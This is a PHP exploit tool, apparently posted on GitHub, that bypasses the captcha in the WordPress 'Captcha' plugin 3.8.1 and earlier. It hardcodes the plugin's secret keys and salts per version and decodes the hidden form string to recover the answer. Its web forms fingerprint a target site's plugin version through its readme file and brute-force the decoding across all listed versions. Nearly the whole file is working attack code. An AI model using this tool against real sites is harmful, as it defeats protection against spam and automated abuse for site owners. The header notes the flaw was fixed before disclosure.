Permalink
Switch branches/tags
Nothing to show
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
104 lines (99 sloc) 3.49 KB
<?php
//WordPress Captcha plugin 3.8.1 and previous allow to bypass captcha
//Vulnerables versions: 3.8.1 and previous
//Fixed in: 3.8.2 (corrected before disclosure)
//Plugin page: https://wordpress.org/plugins/captcha
function decode( $String, $Key, $Salt )
{
$StrLen = strlen( $String );
$Seq = $Key;
$Gamma = '';
while ( strlen( $Gamma ) < $StrLen ) {
$Seq = pack( "H*", sha1( $Seq . $Gamma . $Salt ) );
$Gamma.= substr( $Seq, 0, 8 );
}
$String = base64_decode( $String );
$String = $String^$Gamma;
$DecodedString = substr( $String, 1 );
$Error = ord( substr( $String, 0, 1 ) ^ substr( pack( "H*", sha1( $DecodedString ) ), 0, 1 ));
if ( $Error )
return false;
else
return $DecodedString;
}
$captcha_version = array (
//I cannot found versions prior to 2.12 and the 3.8.0
"2.12 to 2.34" => array("key" => "123", "salt" => "BGuxLWQtKweKEMV4"),
"2.4 to 2.4.4" => array("key" => "bws2012", "salt" => "5tOYgjaWC2VtdEWQ"),
"3.0 to 3.3" => array("key" => "bws2012", "salt" => "5tOYgjaWC2VtdEWQ"),
"3.4 to 3.6" => array("key" => "bws18042013", "salt" => "5tOYgjaWC2VtdEWQ"),
"3.7 to 3.7.2" => array("key" => "bws18042013", "salt" => "5tOYgjaWC2VtdEWQ"),
"3.7.3 to 3.7.7" => array("key" => "bws-17072013", "salt" => "5tOYgjaWC2VtdEWQ"),
"3.7.8 & 3.7.9" => array("key" => "bws-23082013", "salt" => "5tOYgjaWC2VtdEWQ"),
//key & salt wasn't change between 3.7.9 and 3.8.1 so I assume that they are the same for 3.8.0
"3.8.0 & 3.8.1" => array("key" => "bws-23082013", "salt" => "5tOYgjaWC2VtdEWQ")
);
?>
<html>
<head><title>Captcha WP Decoder</title></head>
<body>
<h2>Get plugin version</h2>
<div name="get_plugin_version">
<form method="POST">
<br />
Target WordPress URL (with https?://): <input type="text" name="url" size="25px" />
<input type="Submit" value="Get version!" />
</form>
<?php
if (isset($_POST['url']))
{
$captcha_readme_file ="/wp-content/plugins/captcha/readme.txt";
echo $_POST['url'] . $captcha_readme_file . '<br/>';
$readme = file_get_contents($_POST['url'] . $captcha_readme_file);
$temp = explode('Stable tag: ', $readme);
$temp = explode('License', $temp[1]);
$version = $temp[0];
echo "Version found: " . $version ;
}
?>
</div>
<h2>Break captcha using the version</h2>
<div name="break_captcha">
<form method="POST">
Version:
<select name="version">
<?php
foreach ($captcha_version as $key => $value)
echo "<option>" . $key . "</option>"
?>
</select>
<br/>
Hidden string: <br />
<input type="text" name="hidden_string" /> <br/>
<input type="Submit" value="Calculate" />
</form>
<?php
if (isset($_POST['hidden_string']) && isset($_POST['version'])&& !isset($_POST['bruteforce']))
echo trim( decode( $_POST['hidden_string'], $captcha_version[$_POST['version']]['key'], $captcha_version[$_POST['version']]['salt'] ) ) ;
?>
</div>
<h2>Bruteforce captcha</h2>
<div name="bruteforce_captcha">
<form method="POST">
Hidden string: <br />
<input type="text" name="hidden_string" /> <br/>
<input type="hidden" name="bruteforce" />
<input type="Submit" value="Calculate" />
</form>
<?php
if (isset($_POST['hidden_string']) && isset($_POST['bruteforce']))
foreach ($captcha_version as $key => $value)
{
$result = decode( $_POST['hidden_string'], $captcha_version[$key]['key'], $captcha_version[$key]['salt']) ;
if ($result != "")
echo "Version: " . $key . ": " . trim($result) . "<br/>";
}
?>
</div>
</body>
</html>